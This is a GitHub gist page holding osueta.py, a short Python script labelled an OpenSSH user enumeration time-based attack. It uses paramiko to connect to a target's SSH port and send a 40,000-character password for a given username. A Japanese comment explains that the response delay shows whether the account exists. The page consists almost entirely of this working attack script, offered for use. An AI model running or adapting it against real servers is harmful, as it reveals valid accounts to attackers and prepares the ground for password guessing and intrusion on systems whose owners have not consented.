Skip to content

Instantly share code, notes, and snippets.

@ozuma

ozuma/osueta.py

Last active August 29, 2015 14:02
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ozuma/43a30b3498c6e5f0781c to your computer and use it in GitHub Desktop.
Save ozuma/43a30b3498c6e5f0781c to your computer and use it in GitHub Desktop.
Download ZIP
OpenSSH User Enumeration Time-Based Attack
Raw
osueta.py
#!/usr/bin/python
# coding: UTF-8
# OpenSSH User Enumeration Time-Based Attack
# https://cureblog.de/2013/07/openssh-user-enumeration-time-based-attack/
# 存在するユーザの場合は数十秒、存在しないユーザならば数秒で終わるため判定可能
import sys
import socket
import paramiko
hostname = sys.argv[1]
user = sys.argv[2]
s = socket.create_connection((hostname, 22))
t = paramiko.Transport(s)
t.connect(username = user)
t.auth_password(user,'A' * 40000)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment